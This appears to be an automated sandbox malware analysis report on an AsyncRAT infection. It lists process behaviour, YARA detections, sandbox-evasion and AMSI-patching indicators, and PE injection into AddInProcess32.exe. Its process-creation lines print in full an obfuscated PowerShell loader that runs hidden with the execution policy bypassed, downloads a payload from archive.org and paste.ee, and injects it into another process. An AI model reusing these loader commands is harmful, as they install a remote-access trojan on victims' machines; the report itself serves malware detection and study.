Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 4810000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_00007FFD347A9009 sldt word ptr fs:[eax]

4_2_00007FFD347A9009

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2073	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1298	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3519	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6267	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 5357	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 4461	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380	Thread sleep count: 3519 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720	Thread sleep count: 6267 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1016	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4460	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3428	Thread sleep count: 5357 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3428	Thread sleep count: 4461 > 30	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000004.00000002.2294123170.00000219A7124000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|
Source: AddInProcess32.exe, 00000005.00000002.3466547195.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3478584965.0000000004E04000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3478408886.0000000004DE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, Win32.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, Win32.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, Amsi.cs	Reference to suspicious API methods: Win32.VirtualAllocEx(procAddress, (UIntPtr)(ulong)patch.Length, 64u, out var _)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 410000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 70D008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4kcaojzknkydqrhvybca9ihynkydlnwh0jysndccrj3ankydzoi8vawe2mccrjzaxmdaudxmuyscrj3jjaccrj2l2zs5vjysncmcvmicrjzqvaxrlbxmvzgv0yscrj2gtjysnbm90zs12l0qnkydldgfojysntm90zvyudhh0jysndmu1oycrjzlqrgjhc2u2nenvjysnbnqnkydlbnqnkycgpsaoticrj2v3lu9iaicrj2vjjysndcbtexmnkyd0zw0nkycujysntmv0lldlyknsawvudckurg93bmwnkydvywrtjysndhinkydpbmcoowpedxinkydsjysnkts5akrijysnaw5hjysncnknkyddjysnb250zw50id0gjysnw1n5cycrj3rlbs4nkyddb252zxj0xto6rnjvbscrj0jhjysnc2u2nfn0cicrj2knkyduzygnkyc5jysnakriyxnlnjrdb24nkyd0zw4nkyd0kts5akrhc3nlbwjsesa9iftsjysnzwzszwn0jysnaw9ulkfzc2vtymwnkyd5xto6tg9hzcg5akqnkydiaw4nkydhcnldb24nkyd0zw4nkyd0kts5akqnkyd0exblid0goscrj2peyxnzzw1ijysnbhkur2v0jysnvhknkydwzsh2ztvsdw5qrs5ib21ldicrj2u1kts5jysnakqnkydtzxrob2qgpsa5aicrj0r0jysnexankydllkdlde1ldghvzch2ztvwqul2ztupozlqrg1ldccrj2hvzc4nkydjbnynkydvjysna2uoowpebnvsbccrjywgw29iamvjdccrj1snkyddxuaodmu1mc9nticrj1rhjysnqs9kl2vllmv0c2fwly86c3b0jysndggnkyd2ztuglcb2ztvkzxmnkydhdgl2ywrvdmu1icwgdmu1zgvzyxrpjysndmfkb3zlnsankycsiccrj3zlnwrlc2f0axynkydhzg92jysnztusdmunkyc1qwrksw4nkydqcicrj29jzscrj3nzmzj2ztusdmu1dmu1jysnkscrjyknks5szvbsyunlkcc5akqnlftzdhjjtkddw0noqvjdmzyplljlugxhq2uoj3zlnscsw3n0cklor11bq2hbul0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex( ('9'+'jdurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/d'+'etah'+'notev.txt'+'ve5;'+'9jdbase64co'+'nt'+'ent'+' = (n'+'ew-obj'+'ec'+'t sys'+'tem'+'.'+'net.webclient).downl'+'oads'+'tr'+'ing(9jdur'+'l'+');9jdb'+'ina'+'ry'+'c'+'ontent = '+'[sys'+'tem.'+'convert]::from'+'ba'+'se64str'+'i'+'ng('+'9'+'jdbase64con'+'ten'+'t);9jdassembly = [r'+'eflect'+'ion.assembl'+'y]::load(9jd'+'bin'+'arycon'+'ten'+'t);9jd'+'type = 9'+'jdassemb'+'ly.get'+'ty'+'pe(ve5runpe.homev'+'e5);9'+'jd'+'method = 9j'+'dt'+'yp'+'e.getmethod(ve5vaive5);9jdmet'+'hod.'+'inv'+'o'+'ke(9jdnull'+', [object'+'['+']]@(ve50/mn'+'ta'+'a/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5addin'+'pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').replace('9jd',[string][char]36).replace('ve5',[string][char]39) )"
